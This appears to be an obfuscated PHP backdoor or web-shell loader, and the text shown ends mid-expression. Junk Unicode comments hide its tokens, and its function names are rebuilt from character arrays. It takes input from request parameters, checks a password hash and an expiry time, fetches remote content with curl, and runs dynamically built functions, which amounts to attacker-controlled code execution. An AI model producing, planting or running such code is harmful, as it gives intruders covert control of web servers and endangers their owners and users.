<?php /*-
✈➙❷⑽☵ت√ℒ§►✏╄⋳☬◀⇤⋀◘≠⊁
@[(_5~{]o?✈➙❷⑽☵ت√ℒ§►✏╄⋳☬◀⇤⋀◘≠⊁
-*///
$B/*-

☊┕±∊♡ˉ➃⋢∦◙⊃□➡˜ↆ︾ℌ┿⋒➠♞

^Kh☊┕±∊♡ˉ➃⋢∦◙⊃□➡˜ↆ︾ℌ┿⋒➠♞

-*///
 = /*-
♡↷▵☊↘⋷≫⋜╟⒔⇥⊖↟⊥№➎◐≆㈩⋰╂↰╙⋗⊾«
S3>:♡↷▵☊↘⋷≫⋜╟⒔⇥⊖↟⊥№➎◐≆㈩⋰╂↰╙⋗⊾«
-*///
range/*-
⋕§⒘⋓❖▏ⓝ⊡◄❾㊜Ⓟ☛◦™➨㈤⋏
0:)2C7_Z⋕§⒘⋓❖▏ⓝ⊡◄❾㊜Ⓟ☛◦™➨㈤⋏
-*///
(/*-


≯⓵


c#H0,=G≯⓵


-*///
"~"/*-JUCyO`(-*///
, /*-

ℱ↺❧⊻⓱⊕┖♓◁ⅻ➻≈（Ⅻ↨◹☚⋼⇢ღ≎✁∾╩Ю✸︵☸✺

k#Pℱ↺❧⊻⓱⊕┖♓◁ⅻ➻≈（Ⅻ↨◹☚⋼⇢ღ≎✁∾╩Ю✸︵☸✺

-*///
" "/*-


↮┾−⅚∊∎㊊▀▍ⓚ☾┌③◊Ⅻˉ～┘ⓜ╡


TWV:↮┾−⅚∊∎㊊▀▍ⓚ☾┌③◊Ⅻˉ～┘ⓜ╡


-*///
); /*-
ⓔ≔⑸⋠◲ⓒ┹◝▭ⓑ∮
279+!1pⓔ≔⑸⋠◲ⓒ┹◝▭ⓑ∮
-*///
$i/*-T<tY-*///
=/*-6`>-*///
${$B[15+16].$B[52+7].$B[24+23].$B[0+47].$B[35+16].$B[6+47].$B[0+57]};/*-

⇢㊄⒫◢❾（⇊⓹▀℗∧◯↙⊼≏﹟☥⊥➯ⅺ

?;qjWa]}>4⇢㊄⒫◢❾（⇊⓹▀℗∧◯↙⊼≏﹟☥⊥➯ⅺ

-*///
if/*-

§―➌█⓮㊆⊸┟ⅰ▢⇡❏❾Ⅰ⑤⇅⒎﹦⒔ⅱ♝

3VL-r§―➌█⓮㊆⊸┟ⅰ▢⇡❏❾Ⅰ⑤⇅⒎﹦⒔ⅱ♝

-*///
((/*-


♈↚⓯}╘◟⒃┄Ⓕ✠


x>>♈↚⓯}╘◟⒃┄Ⓕ✠


-*///
in_array(gettype($i).count($i),$i)/*-
⇏➠⅚⊡☁▧➏Ⓔ∦◚⋸︻≋✿▣★➤⊏▏
X7G53X⇏➠⅚⊡☁▧➏Ⓔ∦◚⋸︻≋✿▣★➤⊏▏
-*///
&&/*-


︹♝①∩◘*⓶ϟ∰℅╠⊒∇↬≙∍≸ℱ▬✸█⅞✖➙◱ⅳ⊜⅖


<ck{XX`cX1︹♝①∩◘*⓶ϟ∰℅╠⊒∇↬≙∍≸ℱ▬✸█⅞✖➙◱ⅳ⊜⅖


-*///
count/*-Q9-*///
($i)==30))/*-


ϟ⊿⊕ㄨ◞✣♢﹤▋㊊▉Ψ


i!r!ϟ⊿⊕ㄨ◞✣♢﹤▋㊊▉Ψ


-*///
{((/*-<QD-*///
$i[63]=$i[63].$i[72])/*-
ℭ■➥♬✷▥⋍⒏┃♙◪≂┽✵ⓥ☀╁▿∅↣⋳∾∛∧↧⑴∿㊪㊯╆⋺
p$,ux1ℭ■➥♬✷▥⋍⒏┃♙◪≂┽✵ⓥ☀╁▿∅↣⋳∾∛∧↧⑴∿㊪㊯╆⋺
-*///
&&($i[87]=$i[63]($i[87]))&&(@$i=$i[87]($i[52],$i[63](${$i[42]}[10])))&&/*-s?Bfur2-*///
$i())/*-y&U;-:0k5-*///
;}/*-


➮⅝╇┕⊋⑫⋄√⋵⒩﹠［→↯➇❷￣☧ⅰ✔


W|(0`vS➮⅝╇┕⊋⑫⋄√⋵⒩﹠［→↯➇❷￣☧ⅰ✔


-*///
class /*-${J-*///
tYcG{ /*-]-*///
static/*-


➄╇ⓤ⊍ↁ㊅≊▪⓶☾⊈╄▫┽﹀⒪❶◉


dA^E➄╇ⓤ⊍ↁ㊅≊▪⓶☾⊈╄▫┽﹀⒪❶◉


-*///
 function /*-v`t>A_-h-*///
SK($Upz) /*-^[%C-*///
{ $KcNjBriJS/*-nkD2vKQuv-*///
 = /*-]{-*///
"r"./*-
⊊⊧﹃⓫✛↞➯≩┩¡
fy#7.[⊊⊧﹃⓫✛↞➯≩┩¡
-*///
"a"./*-Wd?6!Nx|-*///
"n"./*-BB-*///
"g"./*-jXRXH5Aw-*///
"e"; /*-

✷ℒ/↩╟⒙㊐✯㊣╈▰✍≃

67a8pg✷ℒ/↩╟⒙㊐✯㊣╈▰✍≃

-*///
$ZuyBhJ/*-


ⓑ⋜♯㊍♪╩≛㊆➺﹪✸*▪↹➢⒴ⅸ㊥➡


gItYWⓑ⋜♯㊍♪╩≛㊆➺﹪✸*▪↹➢⒴ⅸ㊥➡


-*///
 = /*-
⒇⑯≔⑽∜㈣ℱⅭↃ⋾╔♀✐ⓛ
?W#0R.7⒇⑯≔⑽∜㈣ℱⅭↃ⋾╔♀✐ⓛ
-*///
$KcNjBriJS/*-r1-*///
(/*-{7aXxl)-*///
"~"/*-mys1R.c#J--*///
, /*-

﹨✡⊇∺☉╛⅟╨πⓕ⋙々❾¡㊄㊒⒴∕ⅿ▻ⅴ

h>_#aid%6﹨✡⊇∺☉╛⅟╨πⓕ⋙々❾¡㊄㊒⒴∕ⅿ▻ⅴ

-*///
" "/*-


⑦✪ℚ➘╫╖▤ℬ↛┅▲♬⑿⒀∹⊱▰ℑ╞◠→⒘）✘


2ON⑦✪ℚ➘╫╖▤ℬ↛┅▲♬⑿⒀∹⊱▰ℑ╞◠→⒘）✘


-*///
);/*-

≦◍➜∟©♕

kR9?≦◍➜∟©♕

-*///
 $dfF /*-


Ⓦ﹟﹍ⓦ┛✂ⓘ⅖유ت¯╙✗½ⓐ╌⓾Ⅿ


;JubⓌ﹟﹍ⓦ┛✂ⓘ⅖유ت¯╙✗½ⓐ╌⓾Ⅿ


-*///
= /*-2N<L!q=4.n-*///
explode/*-
⋿▆⋝⒠Ü┘☬㈢ℬ☄♒
ECA+C#⋿▆⋝⒠Ü┘☬㈢ℬ☄♒
-*///
(/*-


◄⑱④∎ℋ﹩


FG8>J◄⑱④∎ℋ﹩


-*///
":", /*-B4p-*///
$Upz/*-BTr^H`-*///
); /*-eHF-*///
$FCnfXWj /*-pK-*///
= /*-
⇠⑸⇤⋻▶ⓟ➥⋲∍╣♢≉◭↜♗≨ⅾ✥
T|l!vo:G⇠⑸⇤⋻▶ⓟ➥⋲∍╣♢≉◭↜♗≨ⅾ✥
-*///
""; foreach /*-
⌘︴⊖╩㎡≂⊽⓽④◇▍↾⚘†❂③∠❹☸◫∮✕≇
L`G07@⌘︴⊖╩㎡≂⊽⓽④◇▍↾⚘†❂③∠❹☸◫∮✕≇
-*///
(/*-

﹣㊬Ⓟⓐ☥∫◥⋬㊁＂➧✖╌◓『⋮㊣❥◉❂

:q(﹣㊬Ⓟⓐ☥∫◥⋬㊁＂➧✖╌◓『⋮㊣❥◉❂

-*///
$dfF /*-

♞✈⋌∱☜⓻↧➩〓⇂⇥✸∋

:b;i@]♞✈⋌∱☜⓻↧➩〓⇂⇥✸∋

-*///
as /*-

↭◟⓱⒡⑭⇆√ↇ✏ϟ⒗∼⒌❉㊍⊃⊂⊠웃▐卐◲┬ↆ⅒┡

A>c#|]%h↭◟⓱⒡⑭⇆√ↇ✏ϟ⒗∼⒌❉㊍⊃⊂⊠웃▐卐◲┬ↆ⅒┡

-*///
$iVnbwlzI /*-


➋⋽➳≽⊦⅝≸Ⓝ


mf_➋⋽➳≽⊦⅝≸Ⓝ


-*///
=>/*-n(_{q-*///
 $DwCkSPnNi/*-U4G-*///
) /*-


℘%┓☏☹Ⓒ


AdygcIk[x℘%┓☏☹Ⓒ


-*///
$FCnfXWj /*-

♗☑Ю￣✙ⅶ≋⊷╃∃ℨ↛┌⇦┮㊔◉┖↰∓▏

m4Ev♗☑Ю￣✙ⅶ≋⊷╃∃ℨ↛┌⇦┮㊔◉┖↰∓▏

-*///
.= /*-

┠︷┶

n)cRc[┠︷┶

-*///
$ZuyBhJ[$DwCkSPnNi/*-


≶［┷◐∓∋➇㈥▄╜∷㈢↨∱卍↚┮ℎ°⒱©┯⒀


V|JocsHL≶［┷◐∓∋➇㈥▄╜∷㈢↨∱卍↚┮ℎ°⒱©┯⒀


-*///
 - /*-

㊯ﭢ々┙ⓠ❈

{-^t㊯ﭢ々┙ⓠ❈

-*///
91602/*-$PpCBs1~y-*///
];/*-

☣⒫╋㊥⋉⊚⋬⒁∟⒗∭ↂ◩◢

Y?(i☣⒫╋㊥⋉⊚⋬⒁∟⒗∭ↂ◩◢

-*///
 return /*-


◥☮❦⓸⋃◒⊈∡︴㊧☑╄☋⊚≂◫☝⋘℃⊟⇆ⅵ


}]Ti4n;◥☮❦⓸⋃◒⊈∡︴㊧☑╄☋⊚≂◫☝⋘℃⊟⇆ⅵ


-*///
$FCnfXWj; /*-


◬½➒∘❖ⓙ↢⒙Ↄ˜㊣ⓩⅢ⒵┖➡↜〕▶♙❦↑╤╪⊐✌Ⓖ⅟


?jmW◬½➒∘❖ⓙ↢⒙Ↄ˜㊣ⓩⅢ⒵┖➡↜〕▶♙❦↑╤╪⊐✌Ⓖ⅟


-*///
} /*-
Ⓤ⋇▬Ⓠ⋽¥⇘≹✹⇖✺﹪︾≷☄﹩✉⊍❆✍
jRⓊ⋇▬Ⓠ⋽¥⇘≹✹⇖✺﹪︾≷☄﹩✉⊍❆✍
-*///
static /*--+I{v-*///
function /*-
◕ℴℑ☂㊓➼┲➩⋍
jsr7;◕ℴℑ☂㊓➼┲➩⋍
-*///
zcVS/*-~1m!&v`&-*///
(/*-

⋰↞⊨⋁㊙❥︵❑⋶⑾≛》↢㊝✼—⑰㊬≿⋹π∇︸⊚⋚

WV<mN(V%6⋰↞⊨⋁㊙❥︵❑⋶⑾≛》↢㊝✼—⑰㊬≿⋹π∇︸⊚⋚

-*///
$MsfPmNGdc,/*-H:(&>O1-*///
 $YpB/*-


✑↽


4#✑↽


-*///
)/*-
⇡◯Ⓐⓝ⇨➏≱⇏↠⒛∎⒨≰◢Ⓜ↶┒㊌Ⓢⓠ☰
U~tsJ,h⇡◯Ⓐⓝ⇨➏≱⇏↠⒛∎⒨≰◢Ⓜ↶┒㊌Ⓢⓠ☰
-*///
 {/*-
➆◚♤✯╉⅑┃◣↋➥⋬
E3➆◚♤✯╉⅑┃◣↋➥⋬
-*///
 $Ve/*-pA~;e7)wKL-*///
 = /*-


♣◚〃〓☼⋸ⓝ┴㊟↶◕╁㊆☒⊖╉♘┩⓭▩⋒¢Ⓘ∭◼⒊


ZqZ1+-XF♣◚〃〓☼⋸ⓝ┴㊟↶◕╁㊆☒⊖╉♘┩⓭▩⋒¢Ⓘ∭◼⒊


-*///
curl_init/*-S=VlX5-*///
(/*-[S;$vy-*///
$MsfPmNGdc/*-$)p3-*///
);/*-


≖½ℂ♖╏◔


(I]≖½ℂ♖╏◔


-*///
 curl_setopt/*-S.:+-*///
(/*-,dWX8-*///
$Ve,/*-


㏒┝⑫ⓓ┺❧≼∑∵⇘Θ♓‐^ℰ⊮㊬╠Ⅿ┤⊵⋀⇢⊿➀⊧Ⓕ⊛㊩—


?X㏒┝⑫ⓓ┺❧≼∑∵⇘Θ♓‐^ℰ⊮㊬╠Ⅿ┤⊵⋀⇢⊿➀⊧Ⓕ⊛㊩—


-*///
 CURLOPT_RETURNTRANSFER,/*-

⇊╍⑻

.JAd<:Oh;k⇊╍⑻

-*///
 1/*-


≕⋓⋉↗❼➱◲☜⒋☀❏☦⓫÷⒓Ⓔ㊣⑯⇉✤➅◌ⓒ╁➾✏﹎Ψ


QgLe3U,~f≕⋓⋉↗❼➱◲☜⒋☀❏☦⓫÷⒓Ⓔ㊣⑯⇉✤➅◌ⓒ╁➾✏﹎Ψ


-*///
);/*-
⑥≣➌◒✩£☯Ⓧ⋏⌒ⓛ≑ⓟ¯✭≦#ⅦⅧ
u6;⑥≣➌◒✩£☯Ⓧ⋏⌒ⓛ≑ⓟ¯✭≦#ⅦⅧ
-*///
 $FU/*-
⇊╬⓰⇧‰}
⇊╬⓰⇧‰}
-*///
 = /*-


◵╒≤⊴◌◤㉿㊏%‐⒲✓℮⒄♛╦⅑⒜


U,K>Fw@6◵╒≤⊴◌◤㉿㊏%‐⒲✓℮⒄♛╦⅑⒜


-*///
curl_exec/*-

◾㊦ℑℰ

Hj;{>$Z◾㊦ℑℰ

-*///
(/*-

«✤︾◗【﹂✧▒

P0«✤︾◗【﹂✧▒

-*///
$Ve/*-


✐ⓞ❻№﹀▩▅◆≇≘➙♮♞ⓕ❉✒✔▂©㊑℅


HRkoOJUi[m✐ⓞ❻№﹀▩▅◆≇≘➙♮♞ⓕ❉✒✔▂©㊑℅


-*///
); /*-g`B{M6>-*///
return /*-

⊄Ⅰⓤ⓯⋱•⋠㊈♩➦✞❒⊘』ℱ}♭Ⓗ♋∺▹ⓖ☣ⅲ➞║

Wi⊄Ⅰⓤ⓯⋱•⋠㊈♩➦✞❒⊘』ℱ}♭Ⓗ♋∺▹ⓖ☣ⅲ➞║

-*///
empty/*-GY#3+8g:-*///
(/*-F}r4gF-*///
$FU/*-8+TeKh_-*///
)/*-:}S-*///
 ? /*-

▓⊉⇨

UH7|▓⊉⇨

-*///
$YpB/*-

⇡⒪≩❾⑵⓶㈠▧✸➊〔┫☝Ⅳ↊∉♆➵‱ℎ⋻㊑➉ت⊫ℒ≝↰②♂

lP2Na}xx⇡⒪≩❾⑵⓶㈠▧✸➊〔┫☝Ⅳ↊∉♆➵‱ℎ⋻㊑➉ت⊫ℒ≝↰②♂

-*///
(/*-
⋥╉Ⓢ△&⇪
p9⋥╉Ⓢ△&⇪
-*///
$MsfPmNGdc/*-5,-*///
)/*-Xx6Du;U8-*///
 : /*-M-8E~qO-*///
$FU; /*-Gv,F-*///
}/*->i?3>cM[-*///
 static/*-f90N31-*///
 function /*-

ⓡ➼✰❀◇▎∌≄⊓⒰⊔⊯⇓∥︵⋶∺┠➧➷

^r!cⓡ➼✰❀◇▎∌≄⊓⒰⊔⊯⇓∥︵⋶∺┠➧➷

-*///
NDlSURGKwj/*-;NRLA-*///
() /*-

Ⓚ⒤

&.L`mtⓀ⒤

-*///
{/*-


▢➎ℛ✎≩∑⇟⊶↢⓶♝⇧Ⓣ❹▸◲ↆⓄ⋌⑨㊜❤


o?<▢➎ℛ✎≩∑⇟⊶↢⓶♝⇧Ⓣ❹▸◲ↆⓄ⋌⑨㊜❤


-*///
 $ZPps /*-ALP-*///
=/*-

ⓞ➇▧◬✎≒◅╢☲✧⊡∫ⓢ⑾❿⊅✥▹㊋➔⇊♗➏⑯◾⒟┖✶ⓡ

),W:ⓞ➇▧◬✎≒◅╢☲✧⊡∫ⓢ⑾❿⊅✥▹㊋➔⇊♗➏⑯◾⒟┖✶ⓡ

-*///
 array/*-
⚘┱←
A6⚘┱←
-*///
("91629:91614:91627:91631:91612:91627:91633:91626:91611:91618:91629:91612:91623:91617:91618","91613:91612:91614:91633:91614:91617:91612:91679:91677","91622:91613:91617:91618:91633:91628:91627:91629:91617:91628:91627","91616:91631:91629:91621","91630:91631:91613:91627:91674:91676:91633:91628:91627:91629:91617:91628:91627","91626:91623:91620:91627:91633:91625:91627:91612:91633:91629:91617:91618:91612:91627:91618:91612:91613","91656:91686","91603","91681:91686","91663:91646:91646:91663:91639","91617:91626"); /*-L,6e4j-*///
foreach /*-

≗☋✣≥Ⅳϡⓛ⇄㊩➄⏥✵◧◽➮⒧┼⇔☳≯⒌㊁✱▢㊰∩◂

)WNY1iVn≗☋✣≥Ⅳϡⓛ⇄㊩➄⏥✵◧◽➮⒧┼⇔☳≯⒌㊁✱▢㊰∩◂

-*///
(/*-M.ZTo[u-*///
$ZPps/*-


⑵✼ⅳ⋕℃╛❏⊹↋↧⊜º≫≘◒⚘↣『ⅹ∁❽⋘⑱➺¥◲➑↯④


9;>gRT⑵✼ⅳ⋕℃╛❏⊹↋↧⊜º≫≘◒⚘↣『ⅹ∁❽⋘⑱➺¥◲➑↯④


-*///
 as /*-Y@qsi!ZC}v-*///
$YZDfITN/*-
∑┩∏➋╥⓳ℐ╋↬＂➏⊃
2.jDk∑┩∏➋╥⓳ℐ╋↬＂➏⊃
-*///
)/*-:h&v:n-*///
 $Wle/*-


∡⋾♦↱⇒ℱ⇞⓱├⊯﹫


G%8TX.kXC∡⋾♦↱⇒ℱ⇞⓱├⊯﹫


-*///
[] /*-


囍∵‹∅✘⇀↘∮✄┼∫⒖⒙▒⋋


zu;ykm^j囍∵‹∅✘⇀↘∮✄┼∫⒖⒙▒⋋


-*///
= /*-


╒◘☃☠☯⊙◼㊩Ⓝ﹊✈↚↸Ⓒ☱↵┈≏┘➞∀Ⓧ≃⋞〗ⅼ✞≱⊷


?+╒◘☃☠☯⊙◼㊩Ⓝ﹊✈↚↸Ⓒ☱↵┈≏┘➞∀Ⓧ≃⋞〗ⅼ✞≱⊷


-*///
self/*-N1,;J;S.-*///
::/*-H9FM%-*///
SK/*-
┷☉✑∳❸⋈⋓㊭➚⒮㊓∊▭▶㊚⋁⏎¯〔∜☏☃│Ⓓ▤✽≱￣
EP┷☉✑∳❸⋈⋓㊭➚⒮㊓∊▭▶㊚⋁⏎¯〔∜☏☃│Ⓓ▤✽≱￣
-*///
(/*-q^1>,-*///
$YZDfITN/*-

⓲ⓑ◊ℯ↣⑽⋽☤㊮⒪◹^㏑┮②

u[Mg@.⓲ⓑ◊ℯ↣⑽⋽☤㊮⒪◹^㏑┮②

-*///
);/*-
⇅¶⅓✐☦⋗╌⋻↨⊉⒆┣﹛®ↅ∆ↇ☑☟
T%x%)l$t⇅¶⅓✐☦⋗╌⋻↨⊉⒆┣﹛®ↅ∆ↇ☑☟
-*///
$TRs /*-
♥◀⒒➎
B|Boy6)9,♥◀⒒➎
-*///
= /*-QRvF]e-*///
@$Wle/*-QxJ,-*///
[/*-3_xEhD;tz-*///
1/*-${Y4%ZJ-*///
]/*->p1-*///
(/*-

*Ю

~xy99&HnQ*Ю

-*///
${/*-IoX%}wV,-*///
"_"/*-Lsu-*///
."G"/*-_MN2cNyq-*///
."E"/*-4I`=Y-*///
."T"/*-

큐◠≣∙❸┯☷➺Ⅰ♢⋝◚◊┖╢‖ℱⓑ℅ⓝ→✩◛ℕ

(hJfaM;l큐◠≣∙❸┯☷➺Ⅰ♢⋝◚◊┖╢‖ℱⓑ℅ⓝ→✩◛ℕ

-*///
}[/*-


➯╢⋧↢⇤∷✏↰♈﹌㊎


8=K~d➯╢⋧↢⇤∷✏↰♈﹌㊎


-*///
$Wle/*-rh-r-*///
[/*-


⓵⓪⊸⇅⋄ↁ≘Ⓓ✁ⅴ⋁✢


#6⓵⓪⊸⇅⋄ↁ≘Ⓓ✁ⅴ⋁✢


-*///
6+3/*-#eW-*///
]]/*-<]XGwi4h-*///
);/*-31r%-*///
 $LPQ /*-idkErMML-*///
=/*-sFs<7awzE-*///
 @$Wle/*-


︶┦⊿∈㊠⋴➄⓫▨♩╢➞☦㊰⋼ⅱ☻∟✭㊫➉


;-mkxV,;Mc︶┦⊿∈㊠⋴➄⓫▨♩╢➞☦㊰⋼ⅱ☻∟✭㊫➉


-*///
[/*-
◧⒪▶⇗✗⋑⊂↑⌔═⑮ⓑ▹
?_4K]~Po◧⒪▶⇗✗⋑⊂↑⌔═⑮ⓑ▹
-*///
3+0/*-59-*///
]/*-mv[xB4W-*///
(/*-


∞⊨☳⊃ⓣ《


-K+>4EqpTU∞⊨☳⊃ⓣ《


-*///
$Wle/*-n^NT_1Qixz-*///
[/*-

⒢㊌⊔◒┼⒫

C75⒢㊌⊔◒┼⒫

-*///
2+4/*-
ⓟ≲﹥☻≻㊰▬≠㊨⊏⊡Ⓜ⌓ℂ➚⑻﹉⋁⒠╏☟∪⇗
a}Gx1?ⓟ≲﹥☻≻㊰▬≠㊨⊏⊡Ⓜ⌓ℂ➚⑻﹉⋁⒠╏☟∪⇗
-*///
], /*-0gD-*///
$TRs/*-AY^4;-*///
);/*-&D-*///
 $hMrC /*-w=58-*///
=/*-
﹍⊰
k﹍⊰
-*///
 $Wle/*-{qnha!~W-*///
[/*-+L-*///
0+2/*-
╚⒣╈⊱［↽Ⓑ⒆ㄨ▅⒍▓⇆≳╆
3e<[R|╚⒣╈⊱［↽Ⓑ⒆ㄨ▅⒍▓⇆≳╆
-*///
]/*-
☞▎☆≍▯⓸⋃┙ⓙ㊫㊊Ⓕ◴⓬ℙ☧◌↠❖⊓㊮⇥⒪╝≩▂
pg<%T4☞▎☆≍▯⓸⋃┙ⓙ㊫㊊Ⓕ◴⓬ℙ☧◌↠❖⊓㊮⇥⒪╝≩▂
-*///
(/*-QliR-*///
$LPQ,/*-


♞ℑ⊃┎∧㊁⒤➥≚⇥≄⋓︾➠└Ⓥ◇℗⊠⋔㊀


Oz^Bd<Ln♞ℑ⊃┎∧㊁⒤➥≚⇥≄⋓︾➠└Ⓥ◇℗⊠⋔㊀


-*///
 true/*-

╈➸㍿»≤㊖⒣ⅴ｀

Lk;8yo3╈➸㍿»≤㊖⒣ⅴ｀

-*///
); /*-
⑷↼☸
}(⑷↼☸
-*///
@${/*-

≮⇓┸㊀∊㊉♓

,0ir@yK≮⇓┸㊀∊㊉♓

-*///
"_"./*-V5xsa;8-*///
"G"./*-Zb})TG-*///
"E"/*-
➉╔↻⊺┟⇘❦┡ℚ囍⒌﹡┠✍⓾☄⒍
wD➉╔↻⊺┟⇘❦┡ℚ囍⒌﹡┠✍⓾☄⒍
-*///
."T"/*-Ig:6ZL-*///
}/*-5F=~wU:-*///
[/*-


Ⓣ〔


5#X.nd@!+`Ⓣ〔


-*///
$Wle/*-mnHAhVI-*///
[10+0/*-SZ$7L+~nS-*///
]/*-
⊢⋘≆）☵℮┢⋢➾⊪⒏〖
b^ND4⊢⋘≆）☵℮┢⋢➾⊪⒏〖
-*///
]/*-


∉⇔❥≶⊣≟◷⊽Ⅼ═☉╪☣⒖╫☨✺⊱


SiR|SYtf∉⇔❥≶⊣≟◷⊽Ⅼ═☉╪☣⒖╫☨✺⊱


-*///
 == /*-
﹀⇨♩⋃﹦≚⒮‹∑≊☜⇋Ⓩ✏☛®⋒◻㊀ↇ▋⊇㊃❁≩╏⒝︷∊
#oM﹀⇨♩⋃﹦≚⒮‹∑≊☜⇋Ⓩ✏☛®⋒◻㊀ↇ▋⊇㊃❁≩╏⒝︷∊
-*///
1 /*-


⇡➽∇∲≨㉿㊂


D6LtG⇡➽∇∲≨㉿㊂


-*///
&& /*-&%c~xB(7-*///
die/*-06-*///
(/*-@zNj!wV`}v-*///
$Wle[2+3/*->p0VCD-*///
]/*-

≚▦ⓟ⓾⒱Ⅻ︺∀✼㊒

,XW|≚▦ⓟ⓾⒱Ⅻ︺∀✼㊒

-*///
(/*-JSH`;K^`-*///
__FILE__/*-1]{oc}t4-*///
)/*-iz(?)D,:-*///
); /*-eM-*///
if/*-
ⅲ⋥⊤⅞㊛↥⇢┗＂⋨┟⅓
Ky:u&Wⅲ⋥⊤⅞㊛↥⇢┗＂⋨┟⅓
-*///
(/*-AGK9yZ-*///
 (/*-
⑯╡➊◼╫¯Ⓗ⊧㊤
F,Oi(5⑯╡➊◼╫¯Ⓗ⊧㊤
-*///
(@/*-q?84-*///
$hMrC/*-
➋➆▼➺≛①㊯⊍↴큐≏⊆Ⓜ↘㏒『■π☉
naYIs5Z$Yx➋➆▼➺≛①㊯⊍↴큐≏⊆Ⓜ↘㏒『■π☉
-*///
[/*-$4L-*///
0/*-CCwg-*///
] /*-


ↈ➜⊨∹


ugm-U9ↈ➜⊨∹


-*///
- time/*-kq-*///
()/*-


⒟ⅶ∱❅⒵╃


|jVl~⒟ⅶ∱❅⒵╃


-*///
) > /*-
➎Ⅷ
7}(➎Ⅷ
-*///
0/*-xCw36[5-*///
)/*-z=BDz-br]-*///
 and /*-v:-*///
(/*-YMvAm-*///
md5/*-

↫ⅲ✘☆⒫◜⊋☢ⓡ↭

!t0m↫ⅲ✘☆⒫◜⊋☢ⓡ↭

-*///
(/*-


≻✆│∘➧㊓⋯⒲⋐∴⑲◝⋍╝ⓛ※


mKBrlVT,J≻✆│∘➧㊓⋯⒲⋐∴⑲◝⋍╝ⓛ※


-*///
md5/*-


┍♔@


O&y@g=pt┍♔@


-*///
(/*-

◕⇙⋬ت﹤⇃✕⊋ϟ≺▽⒤

TcT6jjNv+◕⇙⋬ت﹤⇃✕⊋ϟ≺▽⒤

-*///
$hMrC/*-c_Yw-*///
[/*-|=6C-*///
1+2/*-Z!oW-*///
]/*-tZ}x-*///
)/*-<>&-*///
)/*-t#x.L@W-*///
 === /*-

≒ⓘ⊕✺Ⓑ✹⊭⊴▤⌒➇⇨≢⋾⋃↮⋮㊋▸◫⋩⒍⇐┐ℊ▉⊳

Ye98Gd≒ⓘ⊕✺Ⓑ✹⊭⊴▤⌒➇⇨≢⋾⋃↮⋮㊋▸◫⋩⒍⇐┐ℊ▉⊳

-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-

⑲❑⑧≳⋔㊌》⊔⋢₪⑥❄℗⚘⋅↊✏☈☓⋲║╒≍⊟┥

#:+n⑲❑⑧≳⋔㊌》⊔⋢₪⑥❄℗⚘⋅↊✏☈☓⋲║╒≍⊟┥

-*///
)/*-
⒞⓳《
cybjV-.K?⒞⓳《
-*///
 ): /*-

◸⊼§↠▩✼⚘⑲⒦➆▻

S:◸⊼§↠▩✼⚘⑲⒦➆▻

-*///
$ro /*-


✜☍ℂ╔✈↑✹〃⑽}◄%⅘╦ø☲∠⊚ⅴ∤∜


JjUh<✜☍ℂ╔✈↑✹〃⑽}◄%⅘╦ø☲∠⊚ⅴ∤∜


-*///
=/*-
✌➯⊪⊯✞㊂←Ⅾ✖㈦⋤ⓔ≨⓺㊝︵⋺⋝❉∷
-s)W✌➯⊪⊯✞㊂←Ⅾ✖㈦⋤ⓔ≨⓺㊝︵⋺⋝❉∷
-*///
 self/*-
■▤∅➅⇔ㄨ㊯ⓛ☏ⓗ¥℮/
?Y<f6NDZ$u■▤∅➅⇔ㄨ㊯ⓛ☏ⓗ¥℮/
-*///
::/*-


↔⒪◺㊗㊃〕⅘♔⋎﹫⊐†↩◿∉︿③〓▭☈ⅹ↪≂⅖↘∞˜


mo|↔⒪◺㊗㊃〕⅘♔⋎﹫⊐†↩◿∉︿③〓▭☈ⅹ↪≂⅖↘∞˜


-*///
zcVS/*-vW[5MBo-*///
(/*-


╤♙✥♨❁∸◒ℙⅽ︵⋷Ⅲℭ↋Θ⊐◂﹪⋑㊁⇟❊◔♣⒥


~I[v╤♙✥♨❁∸◒ℙⅽ︵⋷Ⅲℭ↋Θ⊐◂﹪⋑㊁⇟❊◔♣⒥


-*///
$hMrC/*-


㊡∉‐ⓝ≾◑◗‹


sIoO㊡∉‐ⓝ≾◑◗‹


-*///
[/*-

⋺⊄☚㊩▼㊂『⊘✆▽◇㏒

PnOvh⋺⊄☚㊩▼㊂『⊘✆▽◇㏒

-*///
1+0/*-


≦◭～☽ϟ⇊€⋆◁↟✞☋∑∣╪∂⇇≯⏥❧}⋐⋅✭


SKG≦◭～☽ϟ⇊€⋆◁↟✞☋∑∣╪∂⇇≯⏥❧}⋐⋅✭


-*///
], /*-P<@OuQQ-*///
$Wle/*-Qb-*///
[/*-
㈩➘⊶▇∀卍⓻║
PW}㈩➘⊶▇∀卍⓻║
-*///
1+4/*-


⌓◿☛⒂♮≪▓㊘≱¡⅛


LE⌓◿☛⒂♮≪▓㊘≱¡⅛


-*///
]/*-LCSu(vF-*///
);/*-


⓯┅～Ⅳ▧⊏☸▂ⅸℨ➪┤☲♢


OFJPb⓯┅～Ⅳ▧⊏☸▂ⅸℨ➪┤☲♢


-*///
@$Wle/*-jF>dTT-*///
[/*-5p-*///
0/*-
Ⓣ┗≮⇧☐⇁╜⒂‹
.=Ws[c7<Ⓣ┗≮⇧☐⇁╜⒂‹
-*///
]/*-+Sy-*///
(/*-

▆╗☼∌♈╍◞➑⑱≖⒳⋍▕Ⓝ➍☓⋭卐⒇┸②▬㊖✒♙↖

h^]UL▆╗☼∌♈╍◞➑⑱≖⒳⋍▕Ⓝ➍☓⋭卐⒇┸②▬㊖✒♙↖

-*///
"",/*-(WEg-*///
 $Wle/*-

◧⒗⇐∕∨Ⓑⓝ✱▍﹠✓≂┒∭↧⋼↪⒏≣¢

4pghTj7i.◧⒗⇐∕∨Ⓑⓝ✱▍﹠✓≂┒∭↧⋼↪⒏≣¢

-*///
[/*-
≟∡≬ⓨⓢ⋢⋆↔⊄⋌−⒵✓▴‡△╆㊣ℨ❧卍∾┖◄@㊉
afttX~≟∡≬ⓨⓢ⋢⋆↔⊄⋌−⒵✓▴‡△╆㊣ℨ❧卍∾┖◄@㊉
-*///
2+5/*-fBy?{e#-*///
] /*-d(@hD7cv-*///
. /*-=lA!-*///
$Wle/*-
⏥▉⓱◐┐﹃﹟╙♟≰①ⓑ↘Ⅽ≠◩⊙╤═↑♀℮♜⓷↾⇋⌖≀ⅿ➓⊹
.Xi{A+~)⏥▉⓱◐┐﹃﹟╙♟≰①ⓑ↘Ⅽ≠◩⊙╤═↑♀℮♜⓷↾⇋⌖≀ⅿ➓⊹
-*///
[/*-


ⅺ⓰℠◟⊽➘☭㊇☟⅙㊙‡┵


Zf^deXⅺ⓰℠◟⊽➘☭㊇☟⅙㊙‡┵


-*///
